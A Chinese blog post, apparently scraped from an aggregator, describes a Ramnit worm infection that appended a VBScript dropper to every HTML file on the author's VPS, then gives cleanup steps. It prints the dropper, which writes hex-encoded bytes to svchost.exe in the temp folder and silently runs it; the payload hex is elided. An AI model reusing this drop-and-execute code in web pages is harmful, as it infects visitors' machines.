最近发现vps流量疯长 看了下统计 也没看到网站有大流量,查看源码才发现网页被添加了一段很长的js 内容大概是这样

DropFileName = “svchost.exe”

WriteData =

“4D5A0000200000000400000F00FFF.............................................此处省略N个字符串”

Set FSO = CreateObject("Scripting.FileSystemObject")

DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName

If FSO.FileExists(DropPath)=False Then

Set FileObj = FSO.CreateTextFile(DropPath, True)

For i = 1 To Len(WriteData) Step 2

FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))

Next

FileObj.Close

End If

Set WSHshell = CreateObject("WScript.Shell")

WSHshell.Run DropPath, 0

//-->

到vps一看才发现 所有的 html 文件末尾都被加了一段这个代码把页面体积搞的很大 从而导致流量飙升,百度了一晚上没搞明白,第二天又搞了一天试过360杀毒根本没啥用,最后用赛门铁克的  Ramnit 蠕虫病毒 专杀工具给搞定了。下面说下解决方案

1、下载    赛门铁克的  Ramnit 蠕虫病毒 专杀工具

下载后直接运行 点 star 即可 全盘删完后会提示重启 点 yes 重启即可。

2、用专杀工具杀完以后随机检查了几个 html 文件发现还有那段代码,不过不会像之前自己手动删了 然后里面就又被自动加上了,这说明病毒已经被杀掉了可能是文件太多,专杀工具没有全都检测得到,不过没关系可以用批量查找替换工具 ultrareplace 把网站重新查找替换一下即可。

ultrareplace 下载地址:http://www.xiazaiba.com/html/4475.html

目前看上去是问题解决了,还需再观察几天,尽量不要在服务器下载运行来历不明的软件,及时打补丁安装防护工具。

html病毒DropFileName,王国平博客-HTML 感染 DropFileName = “svchost.exe” Ramnit 蠕虫病毒 查杀解决办法...相关推荐

  1. 蠕虫病毒html,HTML 感染 DropFileName = “svchost.exe” Ramnit 蠕虫病毒 查杀解决办法

    参考: https://www.cnblogs.com/wuhairui/p/8297614.html http://www.guopingblog.com/post/100.html 最近发现vps ...

  2. 赛门铁克杀html病毒,HTML 感染 DropFileName = “svchost.exe” Ramnit 蠕虫病毒 查杀解决办法...

    参考: https://www.cnblogs.com/wuhairui/p/8297614.html http://www.guopingblog.com/post/100.html 最近发现vps ...

  3. 感染 <SCRIPT Language=VBScript> DropFileName = “svchost.exe” Ramnit 蠕虫病毒 HTML清除工具

    最近开发一个web项目,html文件在尾部老是自动生成一串乱码,如下图 网上搜了下是电脑已经感染了Ramnit 蠕虫病毒,搜了一遍专杀工具各种收费,基本放弃.无奈电脑有太多东西,重装又浪费时间,时间成 ...

  4. phpstorm正则匹配清理被蠕虫病毒污染的html文件DropFileName = “svchost.exe” Ramnit

    电脑中毒了,本地的html文件全部被蠕虫病毒感染了.本地所有项目里面的html文件全部被破坏了,里面都插入了一个脚本,DropFileName = "svchost.exe" Ra ...

  5. 人生需要规划——感受徐小平 (转自徐小平博客)

    周日晚上,看了世乒赛男单决赛王励勤对马琳的惊天大逆转之后,很是兴奋,过了午夜还睡不着,于是打开电视搜索有趣的节目,最后锁定三个频道轮换着看,一个 是第一财经的财富人生,叶蓉访谈徐小平;一个是央视四套百 ...

  6. 值得看一眼的80句好话----转自徐小平博客

    上网,看到这么一个帖子,觉得很好.网间真是充满了好东西.转贴在这里和大家分享.   01.每天告诉自己一遍:我真的很不错. 02.生气是拿别人做错的事来惩罚自己 03.生活中若没有朋友,就像生活中没有 ...

  7. 怎样取消关注别人的csdn博客

    今天不小心点错 关注了一个人的博客 可是怎么取消关注呢 找了半天 终于找到解决办法 0x01:     来到个人主页 (地址就是https://blog.csdn.net/用户名)      接着将鼠 ...

  8. Svchost.exe病毒

    Svchost.exe是病毒的两种情况 1.利用假冒Svchost.exe名称的病毒程序 这种方式运行的病毒并没有直接利用真正的Svchost.exe进程,而是启动了另外一个名称同样是Svchost. ...

  9. Svchost.exe是病毒的两种情况

    1.利用假冒Svchost.exe名称的病毒程序 这种方式运行的病毒并没有直接利用真正的Svchost.exe进程,而是启动了另外一个名称同样是Svchost.exe的病毒进程,由于这个假冒的病毒进程 ...

最新文章

  1. 什么叫dfs文件服务器,什么是DFS(分布式文件系统)以及DFS的优点
  2. cognos安装教程linux,linux环境下安装cognos10.2.1(菜鸟安装)
  3. 20151026c#2
  4. 2017ACM/ICPC亚洲区沈阳站 C Hdu-6219 Empty Convex Polygons 计算几何 最大空凸包
  5. 开源软件和自由软件_自由和开源软件的经济学
  6. 华为的数字化转型与数据治理
  7. Java集合性能分析-疯狂Java讲义
  8. k8s核心技术-Controller(Deployment)控制器对pod的管理实现_升级回滚和弹性伸缩---K8S_Google工作笔记0030
  9. unity5 静态和动态cubmap
  10. 【数据分析】Python-NumPy模块的使用
  11. ORG LegacyCell for Mac - MS-20/Polysix音频合成器
  12. Tampermonkey 实现 csdn 免登陆复制
  13. 软件测试的测试代码,软件测试(示例代码)
  14. 【PCB设计工具】在线 mil到mm单位转换、mm到mils换算
  15. java时区_Java时区的转换
  16. 老板说“把系统升级到https”,我用一个脚本实现了,而且永久免费!​
  17. UI设计师福利之手把手打造SVG动画应用的微场景
  18. hadoop离线阶段(第十三节)数据仓库、hive简介、hive安装和hive的三种交互模式
  19. python 模拟登录公众号平台,主动推消息等一系列操作
  20. 卡莱特led显示屏调试教程_卡莱特5A接收调屏步骤.doc

热门文章

  1. 17万用来助学,能做什么?
  2. java关于int极限值的测试
  3. 阿语谈流量之自媒体大鱼号讲解1.1.4
  4. 大鱼号短视频如何增加播放量,来提供账号权重,试试这个
  5. navicat ssh postgresql 报错:no password supplied
  6. 计算字符串出现的次数
  7. WPF教程(二) WPF vs WinForms
  8. 浅谈用户行为分析(一)
  9. Android Framework 框架系列之PowerManager
  10. iOS7+系统自带条码扫描